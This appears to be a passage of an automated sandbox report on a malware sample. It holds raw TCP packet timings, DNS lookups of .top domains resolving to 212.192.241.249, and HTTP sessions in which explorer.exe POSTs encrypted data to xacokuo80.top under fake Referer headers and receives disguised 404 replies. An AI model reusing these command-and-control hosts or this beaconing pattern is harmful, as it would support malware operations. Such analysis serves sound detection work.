            Nov 25, 2021 18:24:51.494179964 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.521953106 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.522013903 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.522066116 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.522092104 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.549841881 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.549889088 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.549902916 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.599461079 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.599549055 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.599615097 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.627549887 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.627604961 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.627692938 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.655698061 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.655757904 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.655848980 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.683588028 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.683639050 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.683680058 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.711529970 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.711560011 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.711618900 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.739902973 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.739976883 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.740025043 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.740072966 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.740106106 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.740150928 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.740155935 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.768027067 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.768143892 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.768209934 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.768259048 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.768304110 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.796014071 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.796041012 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.796175957 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.823955059 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.823983908 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.824002028 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.824032068 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.824124098 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.824156046 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.851840973 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.851875067 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.851887941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.851903915 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.851984024 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.852013111 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.880937099 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.880970001 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.880990982 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.881011963 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.881031990 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.881067038 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.908752918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.908798933 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.908839941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.908898115 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:51.908984900 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.909017086 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:51.983108044 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.038594961 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.066570044 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066613913 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066653013 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066692114 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066732883 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066756964 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.066772938 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.066793919 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.066822052 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.094463110 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094510078 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094542027 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094573021 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094604969 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094645977 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.094665051 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.094718933 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.124514103 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124707937 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124764919 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124809980 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.124835968 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.124902010 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.124907017 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.152753115 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.152790070 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.152947903 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.181615114 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.181679010 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.181695938 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.181735039 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.209623098 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.209667921 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.209739923 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.237504005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.237555981 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.237662077 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.265712976 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.265798092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.293829918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293886900 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293930054 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.293956995 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.294002056 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322004080 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322062016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322103977 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.322110891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322151899 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.322166920 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.350096941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350152016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350193977 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.350270033 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.378245115 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.378302097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.378351927 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.406286955 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.406344891 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.406413078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.437220097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.437283993 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.437393904 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.469877005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.469945908 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.498076916 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.498135090 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.498219967 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.498284101 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.526021957 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.526160955 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.526179075 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.526252031 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.554965019 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.555093050 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.583504915 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.583669901 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.611515045 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.611726046 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.640008926 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.640054941 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.640203953 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.668425083 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.711072922 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.741050005 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.741185904 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:52.769049883 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:52.769177914 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.039555073 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.039669991 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.067493916 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.067522049 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.067615986 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.095354080 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.095503092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.123745918 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.123837948 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.154874086 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.154999971 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.182739019 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.182854891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.210673094 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.210738897 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.238432884 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.238468885 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.238516092 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.266179085 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.266206980 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.266288042 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.294073105 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294102907 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294116020 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294132948 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.294264078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.321993113 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322019100 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322031975 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322045088 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.322098970 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.322129011 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.349947929 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.350053072 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.353358984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.353379965 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.353424072 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.353454113 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.377852917 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.377938032 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.381149054 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.381170034 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.381203890 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.381239891 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.408904076 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.408926010 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.408996105 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.438626051 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438673973 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438700914 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.438730001 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.466515064 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.466589928 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.466694117 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.494544029 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.494600058 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.494658947 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.522727966 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.522774935 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.522923946 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.551661968 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.551795006 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.582899094 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.582928896 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.583003998 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.583045959 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.613123894 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.613182068 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.613281012 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.613326073 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.883208990 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.929472923 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.957350016 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.957494974 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:53.985435963 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:53.986890078 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.014875889 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.015114069 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.042807102 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.043723106 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.071611881 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.072237015 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.100414991 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.103739023 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.131922007 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.132128954 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.160303116 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.160347939 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.160897970 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.263168097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.263813972 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.307168961 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.307327032 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.335108995 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.335138083 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.335685015 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.363605976 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.363962889 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.391880989 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.460676908 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.467678070 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.467854977 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.488745928 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.488938093 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.496494055 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.496664047 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.517132998 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.517280102 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.525036097 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.526588917 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.547986984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.554903984 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.555735111 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.583772898 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583856106 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583920956 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.583928108 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.612360001 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.612387896 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.612485886 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640624046 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640650988 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640670061 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640686035 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:54.640716076 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640743017 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640748024 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.640870094 CET4971680192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:54.669049025 CET8049716212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:56.275383949 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333424091 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:57.333610058 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333904028 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.333946943 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:24:57.530147076 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:24:59.157474995 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.445750952 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.829710007 CET8049717212.192.241.249192.168.2.4
            Nov 25, 2021 18:25:02.829880953 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:02.831438065 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:05.977720976 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:12.196557045 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:24.619411945 CET4971780192.168.2.4212.192.241.249
            Nov 25, 2021 18:25:24.838907003 CET8049717212.192.241.249192.168.2.4

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Nov 25, 2021 18:24:49.960967064 CET6151653192.168.2.48.8.8.8
            Nov 25, 2021 18:24:49.985004902 CET53615168.8.8.8192.168.2.4
            Nov 25, 2021 18:24:49.996679068 CET4918253192.168.2.48.8.8.8
            Nov 25, 2021 18:24:50.034112930 CET53491828.8.8.8192.168.2.4
            Nov 25, 2021 18:24:50.222058058 CET5992053192.168.2.48.8.8.8
            Nov 25, 2021 18:24:50.259314060 CET53599208.8.8.8192.168.2.4
            Nov 25, 2021 18:24:50.441802979 CET5745853192.168.2.48.8.8.8
            Nov 25, 2021 18:24:50.765567064 CET53574588.8.8.8192.168.2.4
            Nov 25, 2021 18:24:56.235585928 CET5057953192.168.2.48.8.8.8
            Nov 25, 2021 18:24:56.273138046 CET53505798.8.8.8192.168.2.4
            Nov 25, 2021 18:25:02.845268011 CET5170353192.168.2.48.8.8.8
            Nov 25, 2021 18:25:03.853210926 CET5170353192.168.2.48.8.8.8
            Nov 25, 2021 18:25:04.899115086 CET5170353192.168.2.48.8.8.8
            Nov 25, 2021 18:25:06.899563074 CET5170353192.168.2.48.8.8.8
            Nov 25, 2021 18:25:10.962596893 CET5170353192.168.2.48.8.8.8

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Nov 25, 2021 18:24:49.960967064 CET192.168.2.48.8.8.80x54b3Standard query (0)nalirou70.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:24:49.996679068 CET192.168.2.48.8.8.80xbaStandard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:24:50.222058058 CET192.168.2.48.8.8.80xbfc3Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:24:50.441802979 CET192.168.2.48.8.8.80x11d3Standard query (0)privacytoolzfor-you7000.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:24:56.235585928 CET192.168.2.48.8.8.80x9022Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:25:02.845268011 CET192.168.2.48.8.8.80x5bd9Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:25:03.853210926 CET192.168.2.48.8.8.80x5bd9Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:25:04.899115086 CET192.168.2.48.8.8.80x5bd9Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:25:06.899563074 CET192.168.2.48.8.8.80x5bd9Standard query (0)xacokuo80.topA (IP address)IN (0x0001)
            Nov 25, 2021 18:25:10.962596893 CET192.168.2.48.8.8.80x5bd9Standard query (0)xacokuo80.topA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Nov 25, 2021 18:24:49.985004902 CET8.8.8.8192.168.2.40x54b3Name error (3)nalirou70.topnonenoneA (IP address)IN (0x0001)
            Nov 25, 2021 18:24:50.034112930 CET8.8.8.8192.168.2.40xbaNo error (0)xacokuo80.top212.192.241.249A (IP address)IN (0x0001)
            Nov 25, 2021 18:24:50.259314060 CET8.8.8.8192.168.2.40xbfc3No error (0)xacokuo80.top212.192.241.249A (IP address)IN (0x0001)
            Nov 25, 2021 18:24:50.765567064 CET8.8.8.8192.168.2.40x11d3No error (0)privacytoolzfor-you7000.top212.192.241.249A (IP address)IN (0x0001)
            Nov 25, 2021 18:24:56.273138046 CET8.8.8.8192.168.2.40x9022No error (0)xacokuo80.top212.192.241.249A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • edwxjxx.net
              • xacokuo80.top
            • kwcurllpj.com
            • privacytoolzfor-you7000.top
            • tpjfndspxp.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.449714212.192.241.24980C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 25, 2021 18:24:50.066019058 CET1OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://edwxjxx.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 151
            Host: xacokuo80.top
            Nov 25, 2021 18:24:50.066059113 CET1OUTData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 31 a6 b8 3b
            Data Ascii: lK3{B75Zwmwu$f]d1;K4t!{{lN"rduKE~1tY$<_Q{bC!_)l~
            Nov 25, 2021 18:24:50.207442999 CET2INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 19{i+,GO0


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.449715212.192.241.24980C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 25, 2021 18:24:50.288214922 CET2OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://kwcurllpj.com/
